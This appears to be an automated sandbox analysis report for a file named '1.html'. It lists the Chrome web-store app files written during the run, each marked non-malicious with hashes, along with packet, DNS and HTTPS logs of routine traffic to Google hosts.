Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5\|\|"function"==typeof Object.cre

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\css\craw_window.css

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1741
Entropy (8bit):	4.912380256743454
Encrypted:	false
SSDEEP:	24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
MD5:	67BF9AABE17541852F9DDFF8245096CD
SHA1:	A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
SHA-256:	10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
SHA-512:	298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
Malicious:	false
Preview:	html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\html\craw_window.html

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	810
Entropy (8bit):	4.723481385335562
Encrypted:	false
SSDEEP:	12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
MD5:	34A839BC40DEBC746BBD181D9EF9310C
SHA1:	8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
SHA-256:	BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
SHA-512:	EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
Malicious:	false
Preview:	<!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\flapper.gif

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	GIF image data, version 89a, 30 x 30
Category:	dropped
Size (bytes):	70364
Entropy (8bit):	7.119902236613185
Encrypted:	false
SSDEEP:	768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
MD5:	398ABB308EEBC355DA70BCE907B22E29
SHA1:	CFFB77B8A1724B8F81D98C6D6AD0071D10162252
SHA-256:	2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
SHA-512:	FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
Malicious:	false
Preview:	GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("gk..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g\|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\icon_128.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4364
Entropy (8bit):	7.915848007375225
Encrypted:	false
SSDEEP:	96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
MD5:	4DBC9F9E6F5A08D299BAC9E54DF07694
SHA1:	BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
SHA-256:	91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
SHA-512:	A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
Malicious:	false
Preview:	.PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L\|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...\|....

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\icon_16.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	558
Entropy (8bit):	7.505638146035601
Encrypted:	false
SSDEEP:	12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
MD5:	FB9C46EA81AD3E456D90D58697C12C06
SHA1:	5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
SHA-256:	016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
SHA-512:	ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
Malicious:	false
Preview:	.PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.\|`......p...f.?.D$.y^..........y...\..Z..t6..oRj.@&.u..G.qN).t.-V.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..\|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.475799237015411
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
MD5:	8803665A6328D23CC1014A7B0E9BE295
SHA1:	9DA6EE729D5A6E9F30658B8EC954710F107A641F
SHA-256:	D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
SHA-512:	ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_close.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	252
Entropy (8bit):	6.512071394066515
Encrypted:	false
SSDEEP:	6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
MD5:	0599DFD9107C7647F27E69331B0A7D75
SHA1:	3198C0A5F34DB67F91A0035DBC297354CBC95525
SHA-256:	131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
SHA-512:	0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...\|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_hover.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.423186859407619
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
MD5:	7CB6B9DC1A30F63B8BD976924B75AD96
SHA1:	0C40B0C496D2F2B5F2021C117EC8610AC03AB469
SHA-256:	721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
SHA-512:	4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_maximize.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	166
Entropy (8bit):	5.8155898293424775
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
MD5:	232CE72808B60CBE0F4FA788A76523DF
SHA1:	721A9C98C835D2CD734153BBE07833C6637ECD68
SHA-256:	AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
SHA-512:	4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\images\topbar_floating_button_pressed.png

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.46068685940762
Encrypted:	false
SSDEEP:	3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
MD5:	E0862317407F2D54C85E12945799413B
SHA1:	FA557F8F761A04C41C9A4BA81994E43C6C275DBB
SHA-256:	5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
SHA-512:	07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.

C:\Users\user\AppData\Local\Temp\scoped_dir5208_703805418\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	5.449026004350873
Encrypted:	false
SSDEEP:	24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
MD5:	01334FB9D092AF2AA46C4185E405C627
SHA1:	47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
SHA-256:	F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
SHA-512:	888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
Malicious:	false
Preview:	{.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	1.3298565848475958
TrID:
File name:	1.html
File size:	7195
MD5:	ea483ab89d8b9baf00b953f0636e0520
SHA1:	b0b952334f0d0195b06faed532170263f7fad6c2
SHA256:	5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
SHA512:	a7a45c96b70280104e4c75ee23ad40cada6e9de8f5c93b41a21b2c9a03beac9d3754bfd41f15ffc78b1117a7656525b83135518179568b0f58f7b8fe80fe4c2f
SSDEEP:	24:0WrXdlR1N7IikLnPKZ2ko7RvctXL34S0VMG:0WrXdZUPyNo7RvwXj4S3G
TLSH:	AAE18C355731A8F004A07674015E9CD34F2A0FCF3A459F63669F48352D8C7B32DA5680
File Content Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

File Icon


Icon Hash:	e8d6a08c8882c461

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2022 11:10:17.010709047 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.010751009 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.010823965 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.011291027 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.011322021 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.011385918 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.012346983 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.012372971 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.012608051 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.012624979 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.087598085 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.089025974 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.097816944 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.097842932 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.098061085 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.098079920 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.098824978 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.098905087 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.099268913 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.099344969 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.099680901 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.099746943 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.335728884 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.335937977 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.336119890 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.336374998 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.336422920 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.336496115 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.336503983 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.336750984 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.400316954 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.400404930 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.400446892 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.400516033 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.400597095 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.403640032 CEST	49733	443	192.168.2.4	142.251.209.13
Jun 3, 2022 11:10:17.403676987 CEST	443	49733	142.251.209.13	192.168.2.4
Jun 3, 2022 11:10:17.418183088 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.418329954 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.418349028 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.418381929 CEST	443	49734	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:17.418457985 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.422967911 CEST	49734	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:17.422987938 CEST	443	49734	142.250.184.78	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2022 11:10:16.952723026 CEST	64277	53	192.168.2.4	8.8.8.8
Jun 3, 2022 11:10:16.957890034 CEST	56076	53	192.168.2.4	8.8.8.8
Jun 3, 2022 11:10:16.980067015 CEST	53	64277	8.8.8.8	192.168.2.4
Jun 3, 2022 11:10:16.982903957 CEST	53	56076	8.8.8.8	192.168.2.4
Jun 3, 2022 11:10:25.506529093 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.543351889 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.544006109 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.580526114 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.580615044 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.580655098 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.580697060 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.581079006 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.582525969 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.604737043 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.605094910 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.650645018 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.656913996 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.656955957 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.657491922 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:25.677198887 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.677258015 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:10:25.677759886 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:40.623100996 CEST	58172	443	192.168.2.4	142.250.184.78
Jun 3, 2022 11:10:40.669195890 CEST	443	58172	142.250.184.78	192.168.2.4
Jun 3, 2022 11:13:38.659431934 CEST	57020	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 3, 2022 11:10:16.952723026 CEST	192.168.2.4	8.8.8.8	0xcca9	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)
Jun 3, 2022 11:10:16.957890034 CEST	192.168.2.4	8.8.8.8	0x3474	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)
Jun 3, 2022 11:13:38.659431934 CEST	192.168.2.4	8.8.8.8	0xd81c	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 3, 2022 11:10:16.980067015 CEST	8.8.8.8	192.168.2.4	0xcca9	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2022 11:10:16.980067015 CEST	8.8.8.8	192.168.2.4	0xcca9	No error (0)	clients.l.google.com		142.250.184.78	A (IP address)	IN (0x0001)
Jun 3, 2022 11:10:16.982903957 CEST	8.8.8.8	192.168.2.4	0x3474	No error (0)	accounts.google.com		142.251.209.13	A (IP address)	IN (0x0001)
Jun 3, 2022 11:13:38.678566933 CEST	8.8.8.8	192.168.2.4	0xd81c	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

accounts.google.com

clients2.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49733	142.251.209.13	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2022-06-03 09:10:17 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2022-06-03 09:10:17 UTC	0	OUT	Data Raw: 20 Data Ascii:
2022-06-03 09:10:17 UTC	1	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 03 Jun 2022 09:10:17 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-dsjkhxqcRkZvdU0OqotUkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'nonce-dsjkhxqcRkZvdU0OqotUkA' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2022-06-03 09:10:17 UTC	2	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2022-06-03 09:10:17 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49734	142.250.184.78	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
